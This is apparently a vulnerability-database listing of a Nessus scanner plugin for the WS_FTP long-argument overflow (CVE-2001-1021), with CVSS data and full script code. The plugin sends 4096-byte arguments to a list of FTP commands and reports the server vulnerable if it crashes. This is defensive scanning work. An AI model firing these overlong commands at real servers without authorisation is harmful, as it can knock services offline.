nessus | This script is Copyright (C) 2002-2018 Tenable Network Security, Inc. | WSFTP_OVERFLOWS.NASL
HistoryAug 21, 2002 - 12:00 a.m.

WS_FTP Multiple Command Long Argument Overflow

2002-08-21 00:00:00
This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
www.tenable.com
26

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.768

Percentile

98.2%

It is possible to shut down the remote FTP server by issuing a command followed by an overly long argument.

An attacker may use this flaw to prevent your site from sharing some resources with the rest of the world, or even to execute arbitrary code on your system.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

# Plugin registration. When the scanner loads the script with `description`
# set, only the metadata below is recorded and the script exits before any
# network traffic is generated.
if (description)
{
  # Identity and vulnerability reference.
  script_id(11094);
  script_version("1.22");
  script_cve_id("CVE-2001-1021");

  script_name(english:"WS_FTP Multiple Command Long Argument Overflow");

  # Report text shown to the operator.
  script_set_attribute(attribute:"synopsis", value:
"It is possible to crash the remote FTP server." );
  script_set_attribute(attribute:"description", value:
"It is possible to shut down the remote FTP server by issuing
a command followed by a too long argument.

An attacker may use this flow to prevent your site from 
sharing some resources with the rest of the world, or even
execute arbitrary code on your system." );
  script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version your FTP server." );

  # NOTE(review): this vector rates complete C/I/A impact, while the CVSS2
  # summary published alongside this listing gives
  # AV:N/AC:L/Au:N/C:P/I:P/A:P (7.5). Confirm which rating your
  # prioritisation tooling should consume.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");

  # Dates and plugin type.
  script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/21");
  script_set_attribute(attribute:"vuln_publication_date", value: "2001/07/26");
  script_cvs_date("Date: 2018/08/15 16:35:43");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"Attempts a buffer overflow on many commands");

  # ACT_DENIAL classifies this as a check that can take the target service
  # down. NOTE(review): scan policies with safe checks enabled are expected
  # to skip this category; confirm against the policy in use before relying
  # on this plugin for coverage.
  script_category(ACT_DENIAL);

  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
  script_family(english:"FTP");

  # Must run after these plugins. Presumably they populate the ftp/login and
  # ftp/password KB items read by the script body; verify against them.
  script_dependencie("ftp_anonymous.nasl", "ftpserver_detect_type_nd_version.nasl");
  script_require_ports("Services/ftp", 21);
  exit(0);
}

#

include("audit.inc");
include("global_settings.inc");
include ("misc_func.inc");
include ("ftp_func.inc");


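# Active check for CVE-2001-1021. After logging in, each FTP command listed
# below is sent once with a 4096-byte path argument; the session is then
# closed and a fresh connection is attempted. A server that no longer accepts
# connections after a probe is reported.
#
# The verdict is purely behavioural: nothing in this script inspects the
# server banner, so any FTP service that stops responding during the run is
# reported under this plugin's CVE. Correlate a finding with the detected
# server type and version before acting on it.

port = get_ftp_port(default: 21);

login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");

# Under a "supplied logins only" policy, never fall back to default or
# anonymous credentials.
if (supplied_logins_only && (isnull(login) || isnull(password)))
  audit(AUDIT_SUPPLIED_LOGINS_ONLY);

# Anonymous fallback when the knowledge base holds no FTP credentials.
if (!login) login = "ftp";
# NOTE(review): the literal below is what the hosting page's e-mail
# obfuscation left behind; the plugin's original default password cannot be
# recovered from this listing.
if (!password) password = "[email protected]";

soc = open_sock_tcp(port);
if (!soc) exit(1, "Could not connect to port "+port+".");
if (!ftp_authenticate(socket:soc, user:login, pass:password))
{
  # Without a session the commands below cannot be tested.
  ftp_close(socket: soc);
  exit(0, "Could not log in to the FTP server on port "+port+".");
}

# Commands probed, one per connection.
# NOTE(review): the last entry carries a trailing space, so its request line
# contains two spaces before the argument. This looks unintentional but is
# kept as found.
cmd = make_list(
  "DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
  "RNTO", "SIZE", "STAT", "XMKD", "XRMD "
);
n = max_index(cmd);

for (i = 0; i < n; i = i + 1)
{
  s = strcat(cmd[i], " /", crap(4096), '\r\n');
  send(socket:soc, data:s);
  # Read and discard one reply line; the reply does not drive the verdict.
  recv_line(socket:soc, length:1024);
  ftp_close(socket: soc);

  # Liveness test: the service must accept a new connection after each probe.
  soc = open_sock_tcp(port);
  if (!soc)
  {
    # Report only when service_is_dead() returns a positive result; any other
    # outcome is treated as an inconclusive connection failure.
    if (service_is_dead(port: port) <= 0)
      exit(1, "Could not reconnect to port "+port+".");
    security_hole(port);
    exit(0);
  }

  # Previously the result of this re-login was ignored, so a failed login let
  # the remaining commands go out on an unauthenticated session and the run
  # ended silently as "not vulnerable". Stop and flag the run as inconclusive.
  if (!ftp_authenticate(socket:soc, user:login, pass:password))
  {
    ftp_close(socket: soc);
    exit(1, "Could not log in again on port "+port+" after testing "+cmd[i]+"; the check is inconclusive.");
  }
}

ftp_close(socket: soc);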
